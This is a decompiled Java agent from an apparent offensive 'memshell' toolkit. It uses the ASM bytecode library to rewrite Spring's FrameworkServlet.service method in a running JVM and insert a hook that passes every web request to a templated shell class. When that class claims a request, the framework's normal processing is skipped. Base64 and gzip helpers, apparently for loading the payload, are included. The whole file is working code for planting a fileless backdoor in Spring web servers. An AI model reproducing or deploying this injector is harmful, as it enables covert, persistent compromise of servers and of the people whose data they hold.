/*
 * Decompiled with CFR 0.152.
 */
package com.reajason.javaweb.memshell.springwebmvc.injector;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;
import java.util.zip.GZIPInputStream;
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassVisitor;
import org.objectweb.asm.ClassWriter;
import org.objectweb.asm.Label;
import org.objectweb.asm.MethodVisitor;
import org.objectweb.asm.Type;

public class SpringWebMvcFrameworkServletAgentInjector
implements ClassFileTransformer {
    private static final String TARGET_CLASS = "org/springframework/web/servlet/FrameworkServlet";
    private static final String TARGET_METHOD_NAME = "service";

    public static String getClassName() {
        return "{{advisorName}}";
    }

    public static void premain(String args, Instrumentation inst) throws Exception {
        SpringWebMvcFrameworkServletAgentInjector.launch(inst);
    }

    public static void agentmain(String args, Instrumentation inst) throws Exception {
        SpringWebMvcFrameworkServletAgentInjector.launch(inst);
    }

    private static void launch(Instrumentation inst) throws Exception {
        System.out.println("MemShell Agent is starting");
        inst.addTransformer(new SpringWebMvcFrameworkServletAgentInjector(), true);
        for (Class allLoadedClass : inst.getAllLoadedClasses()) {
            String name = allLoadedClass.getName();
            if (!TARGET_CLASS.replace("/", ".").equals(name)) continue;
            inst.retransformClasses(allLoadedClass);
            System.out.println("MemShell Agent is working at org.springframework.web.servlet.FrameworkServlet.service");
        }
    }

    @Override
    public byte[] transform(final ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] bytes) {
        if (TARGET_CLASS.equals(className)) {
            try {
                ClassReader cr = new ClassReader(bytes);
                ClassWriter cw = new ClassWriter(cr, 3){

                    protected ClassLoader getClassLoader() {
                        return loader;
                    }
                };
                ClassVisitor cv = SpringWebMvcFrameworkServletAgentInjector.getClassVisitor((ClassVisitor)cw);
                cr.accept(cv, 8);
                return cw.toByteArray();
            }
            catch (Exception e) {
                e.printStackTrace();
            }
        }
        return bytes;
    }

    public static ClassVisitor getClassVisitor(ClassVisitor cv) {
        return new ClassVisitor(589824, cv){

            public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) {
                MethodVisitor mv = super.visitMethod(access, name, descriptor, signature, exceptions);
                if (SpringWebMvcFrameworkServletAgentInjector.TARGET_METHOD_NAME.equals(name)) {
                    try {
                        Type[] argumentTypes = Type.getArgumentTypes((String)descriptor);
                        return new AgentShellMethodVisitor(mv, argumentTypes, SpringWebMvcFrameworkServletAgentInjector.getClassName());
                    }
                    catch (Exception e) {
                        e.printStackTrace();
                    }
                }
                return mv;
            }
        };
    }

    public static byte[] decodeBase64(String base64Str) {
        try {
            Class<?> decoderClass = Class.forName("java.util.Base64");
            Object decoder = decoderClass.getMethod("getDecoder", new Class[0]).invoke(null, new Object[0]);
            return (byte[])decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
        }
        catch (Exception ignored) {
            try {
                Class<?> decoderClass = Class.forName("sun.misc.BASE64Decoder");
                return (byte[])decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
            }
            catch (Exception e) {
                throw new RuntimeException(e);
            }
        }
    }

    public static byte[] gzipDecompress(byte[] compressedData) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        GZIPInputStream gzipInputStream = null;
        try {
            int n;
            gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
            byte[] buffer = new byte[4096];
            while ((n = gzipInputStream.read(buffer)) > 0) {
                out.write(buffer, 0, n);
            }
            byte[] byArray = out.toByteArray();
            return byArray;
        }
        catch (Exception e) {
            throw new RuntimeException(e);
        }
        finally {
            try {
                if (gzipInputStream != null) {
                    gzipInputStream.close();
                }
                out.close();
            }
            catch (Exception exception) {}
        }
    }

    public static class AgentShellMethodVisitor
    extends MethodVisitor {
        private final Type[] argumentTypes;
        private final String className;

        public AgentShellMethodVisitor(MethodVisitor mv, Type[] argTypes, String className) {
            super(589824, mv);
            this.argumentTypes = argTypes;
            this.className = className;
        }

        public void visitCode() {
            this.loadArgArray();
            Label tryStart = new Label();
            Label tryEnd = new Label();
            Label catchHandler = new Label();
            Label ifConditionFalse = new Label();
            Label skipCatchBlock = new Label();
            this.mv.visitTryCatchBlock(tryStart, tryEnd, catchHandler, "java/lang/Throwable");
            this.mv.visitLabel(tryStart);
            String internalClassName = this.className.replace('.', '/');
            this.mv.visitTypeInsn(187, internalClassName);
            this.mv.visitInsn(89);
            this.mv.visitMethodInsn(183, internalClassName, "<init>", "()V", false);
            this.mv.visitInsn(95);
            this.mv.visitMethodInsn(182, "java/lang/Object", "equals", "(Ljava/lang/Object;)Z", false);
            this.mv.visitJumpInsn(153, ifConditionFalse);
            this.mv.visitInsn(177);
            this.mv.visitLabel(ifConditionFalse);
            this.mv.visitLabel(tryEnd);
            this.mv.visitJumpInsn(167, skipCatchBlock);
            this.mv.visitLabel(catchHandler);
            this.mv.visitInsn(87);
            this.mv.visitLabel(skipCatchBlock);
        }

        public void loadArgArray() {
            this.mv.visitIntInsn(17, this.argumentTypes.length);
            this.mv.visitTypeInsn(189, "java/lang/Object");
            for (int i = 0; i < this.argumentTypes.length; ++i) {
                this.mv.visitInsn(89);
                this.push(i);
                this.mv.visitVarInsn(this.argumentTypes[i].getOpcode(21), this.getArgIndex(i));
                this.mv.visitInsn(Type.getType(Object.class).getOpcode(79));
            }
        }

        public void push(int value) {
            if (value >= -1 && value <= 5) {
                this.mv.visitInsn(3 + value);
            } else if (value >= -128 && value <= 127) {
                this.mv.visitIntInsn(16, value);
            } else if (value >= Short.MIN_VALUE && value <= Short.MAX_VALUE) {
                this.mv.visitIntInsn(17, value);
            } else {
                this.mv.visitLdcInsn((Object)new Integer(value));
            }
        }

        private int getArgIndex(int arg) {
            int index = 1;
            for (int i = 0; i < arg; ++i) {
                index += this.argumentTypes[i].getSize();
            }
            return index;
        }
    }
}

